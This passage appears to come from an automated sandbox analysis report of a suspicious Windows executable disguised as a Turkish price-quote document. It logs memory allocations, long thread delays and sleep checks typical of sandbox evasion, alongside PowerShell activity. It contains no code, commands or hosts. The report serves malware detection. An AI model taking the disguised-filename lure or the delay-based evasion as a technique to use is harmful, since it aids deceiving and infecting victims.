File source: Process Memory Space: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe PID: 7916, type: MEMORYSTR

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Memory allocated: C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Memory allocated: 2700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Memory allocated: 4700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Memory allocated: 8880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Memory allocated: 9880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Memory allocated: 9A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Memory allocated: AA80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Memory allocated: 2C00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Memory allocated: 2E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Memory allocated: 4E00000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597398	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596336	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 593860	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5871	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3884	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Window / User API: threadDelayed 2329	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Window / User API: threadDelayed 7497	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Window / User API: foregroundWindowGot 1736	Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7936	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7472	Thread sleep count: 2329 > 30	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7472	Thread sleep count: 7497 > 30	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -599782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -597398s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -596336s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe TID: 7452	Thread sleep time: -593860s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599782	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597398	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Thread delayed: delay time: 596719	Jump to behavior
